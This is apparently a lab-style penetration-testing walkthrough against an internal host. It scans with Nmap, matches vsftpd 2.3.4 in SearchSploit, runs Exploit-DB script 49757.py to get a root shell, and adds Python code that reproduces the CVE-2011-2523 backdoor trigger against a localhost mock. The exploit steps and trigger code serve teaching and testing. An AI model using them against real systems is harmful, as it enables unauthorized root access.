We have been asked to perform a basic penetration test against an internal server. The server's IP is 10.0.0.219.
The goal of this penetration test is to determine if there are any potential paths an attacker could take to compromise the system.
Note: Some of these services are not running on this box, so some of the terminal interactions in this exercise are simulated. This lets you see how the commands behave in the real world.
Network Enumeration with Nmap
We’ll first start by performing some basic enumeration on the host using the following command:
nmap -sV 10.0.0.219
Note: Network enumeration is the process of obtaining information about a network and the hosts on it. The -sV flag makes Nmap probe each open port and report the service name and version it identifies. Nmap itself does not tell you whether a service is vulnerable; the version strings it returns are what we match against an exploit database in the next step, so an unidentified or mis-fingerprinted version is worth checking by hand before moving on.
Searching Databases with SearchSploit
Now that we have a list of running services from the terminal output, we'll search through them for potential exploits. Specifically, we want to look at vsftpd 2.3.4, which was on port
To search through these services, we’ll use the tool SearchSploit.
To have SearchSploit list the exploits that match a service, we pass the service name and version to it using the following command (the quotes keep the name and version together as one search term):
searchsploit "vsftpd 2.3.4"
It appears that we've found two potential exploits for this exact version:
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
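Doing this by hand for one service is fine, but a real scan usually turns up a dozen version strings. The script below is an added example, not part of the original walkthrough: it parses the grepable output Nmap writes with `nmap -sV -oG - 10.0.0.219` into (host, port, service, version) rows and builds one `searchsploit` command per open port with an identified version. The scan output embedded in it is a hand-written sample in that format, not a real result, and the query-trimming rule (keep the product name and the first version-looking token) is this example's own heuristic.

```python
"""Turn Nmap -sV grepable output into SearchSploit queries.

Added example, not code from the original page. SAMPLE_GREPABLE is a
constructed sample in the -oG format, not output from a real scan.
"""
import shlex

SAMPLE_GREPABLE = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.0.0.219
Host: 10.0.0.219 ()\tStatus: Up
Host: 10.0.0.219 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 23/open/tcp//telnet//Linux telnetd/, 80/filtered/tcp//http///\tIgnored State: closed (996)
# Nmap done
"""


def parse_grepable(text):
    """Return (host, port, proto, state, service, version) for every entry in
    the 'Ports:' field of -oG output. Each entry is
    port/state/proto/owner/service/rpc_info/version; only the version may
    itself contain '/', so split on at most six slashes."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                       # comment lines and blank lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue                   # e.g. the 'Status: Up' line
            for entry in field[len("Ports: "):].split(", "):
                parts = entry.split("/", 6)
                if len(parts) < 7:
                    continue               # malformed entry; skip rather than guess
                port, state, proto, _owner, service, _rpc, version = parts
                rows.append((host, int(port), proto, state, service, version.rstrip("/")))
    return rows


def searchsploit_query(version):
    """Keep the product name plus the first token containing a digit.
    Trailing detail such as 'Debian 8ubuntu1 (protocol 2.0)' is never in
    Exploit-DB titles and only makes the search miss entries."""
    words = version.split()
    for i, word in enumerate(words):
        if any(ch.isdigit() for ch in word):
            return " ".join(words[: i + 1])
    return version                         # no version number: search the name alone


def searchsploit_commands(text):
    """One shell-safe `searchsploit` command per open port with a version string."""
    commands = []
    for _host, _port, _proto, state, _service, version in parse_grepable(text):
        if state != "open" or not version:
            continue                       # filtered port or no fingerprint: nothing to search on
        commands.append("searchsploit " + shlex.quote(searchsploit_query(version)))
    return commands


if __name__ == "__main__":
    for command in searchsploit_commands(SAMPLE_GREPABLE):
        print(command)
```

SearchSploit can also do this itself from XML output (`nmap -sV -oX scan.xml 10.0.0.219`, then `searchsploit --nmap scan.xml`); the value of rolling your own is that you can see, and adjust, exactly which search terms were derived from each banner.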
Let's look into the Python file unix/remote/49757.py by inputting the following command into the terminal:
python3 /usr/share/exploitdb/exploits/unix/remote/49757.py
Note: We're using Python 3 to run the file at the path SearchSploit provided. SearchSploit prints paths relative to its exploit directory; `searchsploit -p 49757` prints the full path if you are unsure where that is.
Hm, we get an error. It looks like the Python program needs us to supply a target. Let's provide it with our target's IP by typing the following command into the terminal:
python3 /usr/share/exploitdb/exploits/unix/remote/49757.py 10.0.0.219
Great, we're in! Now, let's see what user we're running as by typing the following command into the terminal:
whoami
You'll notice this says we're root. That means the shell the backdoor handed us already runs with the highest privileges on the host; no privilege escalation step was needed. As root we can execute any command on the server and read any file on it, including sensitive information.
*whoami is a command-line tool that displays the username of the current user.
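It is worth understanding what 49757.py actually sent, because "run the script and get root" hides how little is involved. The vsftpd 2.3.4 backdoor (CVE-2011-2523) is armed by an FTP USER name that contains the characters `:)`; the daemon then opens a root shell on TCP port 6200, and the exploit simply connects to it. The code below is an added example, not the page's exploit and not anything to run against a real host: it replays that exchange against a constructed mock of the backdoored daemon on localhost, with ephemeral ports standing in for 21 and 6200 and a fake shell that only knows `whoami` and `id`. The `arm=False` path is the check a practitioner wants first: the same login with a plain username must not open the shell port.

```python
"""Replay of the vsftpd 2.3.4 backdoor exchange (CVE-2011-2523) against a
constructed mock server on localhost. Added example, not the original page's
exploit. In the real daemon a USER name containing ":)" opens a root shell on
TCP 6200; here both the target and the ports are fake and local."""
import socket
import threading
import time

TRIGGER = ":)"                       # the smiley that arms the backdoor
FTP_BANNER = b"220 (vsFTPd 2.3.4)\r\n"
LOCALHOST = "127.0.0.1"


def _fake_root_shell(cmd: bytes) -> bytes:
    """Stand-in for the backdoor's /bin/sh: canned answers, nothing is executed."""
    cmd = cmd.strip()
    if cmd == b"whoami":
        return b"root\n"
    if cmd == b"id":
        return b"uid=0(root) gid=0(root) groups=0(root)\n"
    return b"sh: " + cmd + b": not found\n"


def _read_line(conn, buf):
    """Read one CRLF-terminated FTP command; returns (line or None at EOF, leftover)."""
    while b"\r\n" not in buf:
        chunk = conn.recv(1024)
        if not chunk:
            return None, buf
        buf += chunk
    line, _, rest = buf.partition(b"\r\n")
    return line, rest


def start_mock_vsftpd():
    """Bind a control socket and a backdoor socket on ephemeral localhost ports
    (standing in for 21 and 6200), serve one client in a daemon thread, and
    return (ctrl_port, shell_port). The backdoor socket only starts listening
    once the trigger arrives, mirroring the real daemon."""
    ctrl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ctrl.bind((LOCALHOST, 0))
    ctrl.listen(1)
    shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    shell.bind((LOCALHOST, 0))       # bound but not listening until triggered

    def serve():
        conn, _ = ctrl.accept()
        try:
            with conn:
                conn.sendall(FTP_BANNER)
                user_line, buf = _read_line(conn, b"")
                if user_line and user_line.upper().startswith(b"USER ") and TRIGGER.encode() in user_line:
                    # Backdoored path: the control session hangs and the shell port opens.
                    shell.listen(1)
                    sconn, _ = shell.accept()
                    with sconn:
                        sconn.sendall(_fake_root_shell(sconn.recv(1024)))
                else:
                    # Normal FTP path: ask for a password, reject it, never open the shell port.
                    conn.sendall(b"331 Please specify the password.\r\n")
                    _read_line(conn, buf)
                    conn.sendall(b"530 Login incorrect.\r\n")
        except OSError:
            pass                     # client hung up early; only sockets to clean up
        finally:
            ctrl.close()
            shell.close()

    threading.Thread(target=serve, daemon=True).start()
    return ctrl.getsockname()[1], shell.getsockname()[1]


def _connect_with_retry(port, attempts=20, delay=0.1):
    """The shell port only appears after the daemon processes USER, so retry briefly."""
    for _ in range(attempts):
        try:
            return socket.create_connection((LOCALHOST, port), timeout=2)
        except OSError:
            time.sleep(delay)
    return None


def trigger_backdoor(ctrl_port, shell_port, cmd=b"whoami", arm=True):
    """Perform the exploit's exchange: USER <name>:) and PASS on the control
    channel, then connect to the shell port and run one command. Returns the
    command output, or None when no shell port opened (not the backdoored
    build, or arm=False, which sends a plain username as a harmless check)."""
    username = "letmein" + (TRIGGER if arm else "")
    with socket.create_connection((LOCALHOST, ctrl_port), timeout=2) as c:
        c.recv(1024)                                   # 220 banner
        c.sendall(f"USER {username}\r\n".encode())
        c.sendall(b"PASS anything\r\n")                # a vulnerable build never answers this
    s = _connect_with_retry(shell_port)
    if s is None:
        return None
    with s:
        s.sendall(cmd + b"\n")
        return s.recv(1024).decode().strip()


if __name__ == "__main__":
    cp, sp = start_mock_vsftpd()
    print("whoami via backdoor:", trigger_backdoor(cp, sp))
```

The retry loop is the one piece of real-world robustness the published exploit also needs: the shell port is not open until the daemon has parsed the USER line, so connecting immediately after sending it can be refused even on a vulnerable host. Seeing "root" come back from a command you never authenticated for is the whole finding; the report should say that any client able to reach the FTP port can do this.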